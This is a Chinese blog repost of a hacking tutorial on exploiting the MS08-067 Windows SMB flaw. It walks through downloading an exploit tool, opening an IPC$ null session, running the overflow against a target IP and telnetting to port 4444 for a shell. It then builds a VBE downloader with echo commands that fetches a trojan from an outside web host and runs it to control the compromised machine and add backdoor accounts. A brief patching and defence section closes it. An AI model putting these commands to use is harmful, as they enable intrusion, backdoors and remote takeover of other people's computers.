zoukankan      html  css  js  c++  java
  • 利用Ms08067工具进行溢出攻击

    当漏洞主机确定后,我们需要从网上下载Ms08-067远程溢出漏洞工具(下载地址:Http://www.youxia.org/upload/2008/10/Ms08-067.rar),然后将其压缩包解压到C盘根目录下。在依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“CMD”命令回车,将CMD命令提示窗口打开。而后跳转到C盘根目录下,并且进入到溢出工具所在的文件夹Release目录,从中直接输入Ms08-067.exe回车,可显示出工具溢出的相关格式,例如显示的Ms08-067.exe ,我们只要把server换成想要攻击的IP主机,就可以进行远程溢出了(图3)。

      

      不过在攻击之前,需要与受害主机建立空连接,例如攻击的主机IP是192.168.1.101,我们建立空连接的命令就为net use \\192.168.1.101\ipc$,然后在执行溢出攻击的Ms08-067.exe 192.168.1.101命令,即可开始对其主机进行远程溢出。当溢出完毕后,返回的结果为SMB connect ok! Send payload over!则是溢出成功的信息提示,反之与其不一样的信息就是溢出失败的信息提示。当远程溢出成功后,我们继续在CMD命令行处,输入telnet IP地址 4444命令,与刚才溢出成功的主机4444端口进行连接,例如telnet 192.168.1.66 4444回车后,就可成功远程登录192.168.1.66主机,从而就可以在其远程主机任意添加自己的后门账号(如图4)。

      

      四、编写VBS脚本扩大战果

      尽管已经成功溢出,并且可以登录远程主机,但是命令行方式的操控,对于我们菜鸟来说,还是很不习惯的,所以得想方设法的将木马上传到远程主机并让其运行,方可直观操作。

      这里继续在远程主机输入命令,其建立脚本文件的命令如下:

      echo iLocal=Lcase(wscript.arguments(1))>wenpeng.vbe

      echo iremote=Lcase(wscript.arguments(0))>>wenpeng.vbe

      echo set xpost=createobject(“microsoft.xmlhttp”)>>wenpeng.vbe

      echo xpost.open “Get”,iremote,0>>wenpeng.vbe

      echo xpost.send() >>wenpeng.vbe

      echo set sget=Createobject(“adodb.stream”)>>wenpeng.vbe

      echo sget.mode=3>>wenpeng.vbe

      echo sget.type=1>>wenpeng.vbe

      echo sget.open()>>wenpeng.vbe

      echo sget.write(xpost.responsebody)>>wenpeng.vbe

      echo sget.savetofile ilocal,2>>wenpeng.vbe

      逐个执行完以上命令语句完毕后,此时就会在远程主机的当前目录下建立一个wenpeng.vbe的脚本文件。接下来将我们事先准备上传到空间的木马,下载到远程主机并执行即可,这里笔者木马存放的位置假设是http://www.show33.com:88/muma.exe,因此在远程主机里下载木马的命令,就应该是cscript wenpeng.vbe http:// www.show33.com:88/muma.exe wenpeng.exe。解释一下这句命令语句,cscript wenpeng.vbe代表执行wenpeng.vbe脚本,后面所跟的网址是想要下载的木马地址,wenpeng.exe则是木马下载后在本机的名称。执行脚本语句完毕后,输入wenpeng.exe回车后,即可使其木马文件在远程主机运行,此时你在利用本机的木马客户端程序与其服务端建立连接,就可非常直观的遥控这台肉鸡了。

      五、防范Ms08-067远程溢出攻击

      由于这个漏洞是致命的,所以一旦被入侵后果将不堪设想,因此我们可以微软的官方站点,下载编号为KB958644的补丁,对其漏洞进行修补。再则通过关闭Computer browser、server、workstation这三个服务关闭,也可防止黑客远程溢出攻击,当然安装防火墙将安全级别设置为高级,也是一种防止黑客入侵的不错选择。

    原文出自【比特网】,转载请保留原文链接:http://sec.chinabyte.com/22/8662522_2.shtml

    本文为原创,遵循BY-NC-ND版权协议,转载请附上原文出处链接和本声明。By:【F0rGeEk】
  • 相关阅读:
    qemu-kvm磁盘读写的缓冲(cache)的五种模式
    关于追踪qemu 源码函数路径的一个方法
    准备升大三啦
    关于Vim的一个配置文件
    POJ 3253
    hihocoder 第二十五周 spfa 最短路
    POJ 2718 穷举
    《鸟哥Linux私房菜基础学习篇》命令索引
    博文流
    《SDN核心技术剖析和实战指南》3.3读书笔记
  • 原文地址:https://www.cnblogs.com/4geek/p/12685666.html
Copyright © 2011-2022 走看看